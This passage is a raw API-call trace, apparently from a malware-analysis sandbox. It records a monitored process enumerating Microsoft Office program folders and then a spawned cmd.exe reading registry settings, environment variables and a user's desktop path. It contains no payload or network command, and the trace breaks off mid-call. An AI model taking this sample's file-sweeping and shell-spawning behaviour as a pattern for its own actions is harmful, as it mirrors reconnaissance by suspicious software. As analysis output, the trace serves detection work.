dwReserved1=0x0, cFileName="MSN MoneyCentral Investor Currency Rates.iqy", cAlternateFileName="MSNMON~1.IQY")) returned 1 [0043.897] FindClose (in: hFindFile=0x3ed1340 | out: hFindFile=0x3ed1340) returned 1 [0043.898] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f42090 | out: hHeap=0x5f0000) returned 1 [0043.898] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd250400, ftCreationTime.dwHighDateTime=0x1cac9b3, ftLastAccessTime.dwLowDateTime=0x5a84fa90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd250400, ftLastWriteTime.dwHighDateTime=0x1cac9b3, nFileSizeHigh=0x0, nFileSizeLow=0xc568, dwReserved0=0x0, dwReserved1=0x0, cFileName="RECALL.DLL", cAlternateFileName="")) returned 1 [0043.898] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES\\*", lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa671530, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa671530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1340 [0043.898] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa671530, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa671530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.898] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc114b600, ftCreationTime.dwHighDateTime=0x1c307de, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xc114b600, ftLastWriteTime.dwHighDateTime=0x1c307de, nFileSizeHigh=0x0, nFileSizeLow=0x1d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="SOLVSAMP.XLS", cAlternateFileName="")) returned 1 [0043.899] FindClose (in: hFindFile=0x3ed1340 | out: hFindFile=0x3ed1340) returned 1 [0043.899] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f42090 | out: hHeap=0x5f0000) returned 1 [0043.899] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd6629a20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x8f968, dwReserved0=0x0, dwReserved1=0x0, cFileName="SAVASWEB.DLL", cAlternateFileName="")) returned 1 [0043.901] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\STARTUP\\*", lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1340 [0043.901] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.901] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0043.901] FindClose (in: hFindFile=0x3ed1340 | out: hFindFile=0x3ed1340) returned 1 [0043.901] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f42090 | out: hHeap=0x5f0000) returned 1 [0043.901] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e8d5600, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xde61b8a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7e8d5600, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x3bb598, dwReserved0=0x0, dwReserved1=0x0, cFileName="STSLIST.DLL", cAlternateFileName="")) returned 1 [0043.903] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\*", lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x504da6a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x504da6a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1340 [0043.903] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x504da6a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x504da6a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.903] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x52203420, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x52203420, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0043.903] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x52203420, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x52203420, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1240 [0043.906] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x504da6a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x52203420, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x52203420, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.906] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d6e4b00, ftCreationTime.dwHighDateTime=0x1ca4888, ftLastAccessTime.dwLowDateTime=0x50526960, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1d6e4b00, ftLastWriteTime.dwHighDateTime=0x1ca4888, nFileSizeHigh=0x0, nFileSizeLow=0x2b600, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACTDIR_M.VST", cAlternateFileName="")) returned 1 Thread: id = 25 os_tid = 0xb04 Thread: id = 26 os_tid = 0xb10 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x4f484000" os_pid = "0xa84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa70" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0xa88 [0032.261] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fcc0 | out: lpSystemTimeAsFileTime=0x19fcc0*(dwLowDateTime=0xb09f6e20, dwHighDateTime=0x1d5246c)) [0032.261] GetCurrentProcessId () returned 0xa84 [0032.261] GetCurrentThreadId () returned 0xa88 [0032.261] GetTickCount () returned 0x18323 [0032.261] QueryPerformanceCounter (in: lpPerformanceCount=0x19fcc8 | out: lpPerformanceCount=0x19fcc8*=15257046584) returned 1 [0032.262] GetModuleHandleW (lpModuleName=0x0) returned 0x4a8b0000 [0032.262] __set_app_type (_Type=0x1) [0032.263] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8d7810) returned 0x0 [0032.263] __getmainargs (in: _Argc=0x4a8fa608, _Argv=0x4a8fa618, _Env=0x4a8fa610, _DoWildCard=0, _StartInfo=0x4a8de0f4 | out: _Argc=0x4a8fa608, _Argv=0x4a8fa618, _Env=0x4a8fa610) returned 0 [0032.263] GetCurrentThreadId () returned 0xa88 [0032.263] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa88) returned 0x3c [0032.266] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0032.266] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0032.266] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0032.266] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0032.266] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc58 | out: phkResult=0x19fc58*=0x0) returned 0x2 [0032.266] VirtualQuery (in: lpAddress=0x19fc40, lpBuffer=0x19fbc0, dwLength=0x30 | out: lpBuffer=0x19fbc0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0032.266] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fbc0, dwLength=0x30 | out: lpBuffer=0x19fbc0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0032.266] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fbc0, dwLength=0x30 | out: lpBuffer=0x19fbc0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0032.266] VirtualQuery (in: lpAddress=0xa4000, lpBuffer=0x19fbc0, dwLength=0x30 | out: lpBuffer=0x19fbc0*(BaseAddress=0xa4000, AllocationBase=0xa0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0032.266] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fbc0, dwLength=0x30 | out: lpBuffer=0x19fbc0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0032.266] GetConsoleOutputCP () returned 0x1b5 [0032.267] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8ebfe0 | out: lpCPInfo=0x4a8ebfe0) returned 1 [0032.267] SetConsoleCtrlHandler (HandlerRoutine=0x4a8d3184, Add=1) returned 1 [0032.267] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.267] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0032.267] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.267] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a8de194 | out: lpMode=0x4a8de194) returned 0 [0032.267] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.267] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a8de198 | out: lpMode=0x4a8de198) returned 0 [0032.268] GetEnvironmentStringsW () returned 0x238a60* [0032.268] GetProcessHeap () returned 0x220000 [0032.268] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xa7c) returned 0x2394f0 [0032.268] FreeEnvironmentStringsW (penv=0x238a60) returned 1 [0032.268] GetProcessHeap () returned 0x220000 [0032.268] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x8) returned 0x2388e0 [0032.268] GetEnvironmentStringsW () returned 0x238a60* [0032.268] GetProcessHeap () returned 0x220000 [0032.268] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xa7c) returned 0x239f80 [0032.268] FreeEnvironmentStringsW (penv=0x238a60) returned 1 [0032.268] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19eb18 | out: phkResult=0x19eb18*=0x44) returned 0x0 [0032.268] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19eb10, lpData=0x19eb30, lpcbData=0x19eb14*=0x1000 | out: lpType=0x19eb10*=0x0, lpData=0x19eb30*=0x18, lpcbData=0x19eb14*=0x1000) returned 0x2 [0032.268] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19eb10, lpData=0x19eb30, lpcbData=0x19eb14*=0x1000 | out: lpType=0x19eb10*=0x4, lpData=0x19eb30*=0x1, lpcbData=0x19eb14*=0x4) returned 0x0 [0032.268] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19eb10, lpData=0x19eb30, lpcbData=0x19eb14*=0x1000 | out: lpType=0x19eb10*=0x0, lpData=0x19eb30*=0x1, lpcbData=0x19eb14*=0x1000) returned 0x2 [0032.268] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19eb10, lpData=0x19eb30, lpcbData=0x19eb14*=0x1000 | out: lpType=0x19eb10*=0x4, lpData=0x19eb30*=0x0, lpcbData=0x19eb14*=0x4) returned 0x0 [0032.269] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19eb10, lpData=0x19eb30, lpcbData=0x19eb14*=0x1000 | out: lpType=0x19eb10*=0x4, lpData=0x19eb30*=0x40, lpcbData=0x19eb14*=0x4) returned 0x0 [0032.269] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19eb10, lpData=0x19eb30, lpcbData=0x19eb14*=0x1000 | out: lpType=0x19eb10*=0x4, lpData=0x19eb30*=0x40, lpcbData=0x19eb14*=0x4) returned 0x0 [0032.269] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19eb10, lpData=0x19eb30, lpcbData=0x19eb14*=0x1000 | out: lpType=0x19eb10*=0x0, lpData=0x19eb30*=0x40, lpcbData=0x19eb14*=0x1000) returned 0x2 [0032.269] RegCloseKey (hKey=0x44) returned 0x0 [0032.269] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19eb18 | out: phkResult=0x19eb18*=0x44) returned 0x0 [0032.269] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19eb10, lpData=0x19eb30, lpcbData=0x19eb14*=0x1000 | out: lpType=0x19eb10*=0x0, lpData=0x19eb30*=0x40, lpcbData=0x19eb14*=0x1000) returned 0x2 [0032.269] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19eb10, lpData=0x19eb30, lpcbData=0x19eb14*=0x1000 | out: lpType=0x19eb10*=0x4, lpData=0x19eb30*=0x1, lpcbData=0x19eb14*=0x4) returned 0x0 [0032.269] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19eb10, lpData=0x19eb30, lpcbData=0x19eb14*=0x1000 | out: lpType=0x19eb10*=0x0, lpData=0x19eb30*=0x1, lpcbData=0x19eb14*=0x1000) returned 0x2 [0032.269] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19eb10, lpData=0x19eb30, lpcbData=0x19eb14*=0x1000 | out: lpType=0x19eb10*=0x4, lpData=0x19eb30*=0x0, lpcbData=0x19eb14*=0x4) returned 0x0 [0032.269] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19eb10, lpData=0x19eb30, lpcbData=0x19eb14*=0x1000 | out: lpType=0x19eb10*=0x4, lpData=0x19eb30*=0x9, lpcbData=0x19eb14*=0x4) returned 0x0 [0032.269] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19eb10, lpData=0x19eb30, lpcbData=0x19eb14*=0x1000 | out: lpType=0x19eb10*=0x4, lpData=0x19eb30*=0x9, lpcbData=0x19eb14*=0x4) returned 0x0 [0032.269] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19eb10, lpData=0x19eb30, lpcbData=0x19eb14*=0x1000 | out: lpType=0x19eb10*=0x0, lpData=0x19eb30*=0x9, lpcbData=0x19eb14*=0x1000) returned 0x2 [0032.269] RegCloseKey (hKey=0x44) returned 0x0 [0032.269] time (in: timer=0x0 | out: timer=0x0) returned 0x5d068293 [0032.269] srand (_Seed=0x5d068293) [0032.269] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0032.269] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0032.269] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.269] GetProcessHeap () returned 0x220000 [0032.269] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x218) returned 0x23aa10 [0032.270] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x23aa20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0032.270] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a8df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0032.270] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a8df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0032.270] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a8df360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0032.270] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0032.270] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0032.270] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0032.270] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0032.270] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0032.270] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0032.270] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0032.270] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0032.270] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0032.270] GetProcessHeap () returned 0x220000 [0032.270] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x2394f0 | out: hHeap=0x220000) returned 1 [0032.270] GetEnvironmentStringsW () returned 0x238a60* [0032.270] GetProcessHeap () returned 0x220000 [0032.270] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xa94) returned 0x23ac30 [0032.270] FreeEnvironmentStringsW (penv=0x238a60) returned 1 [0032.270] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a8df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.270] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a8df360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0032.270] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0032.270] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0032.270] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0032.270] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0032.271] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0032.271] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0032.271] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0032.271] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0032.271] GetProcessHeap () returned 0x220000 [0032.271] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x5c) returned 0x23b6d0 [0032.271] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19f920 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.271] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x19f920, lpFilePart=0x19f900 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x19f900*="Desktop") returned 0x25 [0032.271] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0032.271] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f630 | out: lpFindFileData=0x19f630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x23b740 [0032.271] FindClose (in: hFindFile=0x23b740 | out: hFindFile=0x23b740) returned 1 [0032.271] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x19f630 | out: lpFindFileData=0x19f630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x23b740 [0032.271] FindClose (in: hFindFile=0x23b740 | out: hFindFile=0x23b740) returned 1 [0032.271] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0032.271] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x19f630 | out: lpFindFileData=0x19f630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaab1da20, ftLastAccessTime.dwHighDateTime=0x1d5246c, ftLastWriteTime.dwLowDateTime=0xaab1da20, ftLastWriteTime.dwHighDateTime=0x1d5246c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x23b740 [0032.271] FindClose (in: hFindFile=0x23b740 | out: hFindFile=0x23b740) returned 1 [0032.272] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0032.272] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0032.272] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0032.272] GetProcessHeap () returned 0x220000 [0032.272] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23ac30 | out: hHeap=0x220000) returned 1 [0032.272] GetEnvironmentStringsW () returned 0x23b740* [0032.272] GetProcessHeap () returned 0x220000 [0032.272] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xae8) returned 0x23c230 [0032.272] FreeEnvironmentStringsW (penv=0x23b740) returned 1 [0032.272] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.272] GetProcessHeap () returned 0x220000 [0032.272] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23b6d0 | out: hHeap=0x220000) returned 1 [0032.272] GetProcessHeap () returned 0x220000 [0032.272] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x4016) returned 0x23cd20 [0032.272] 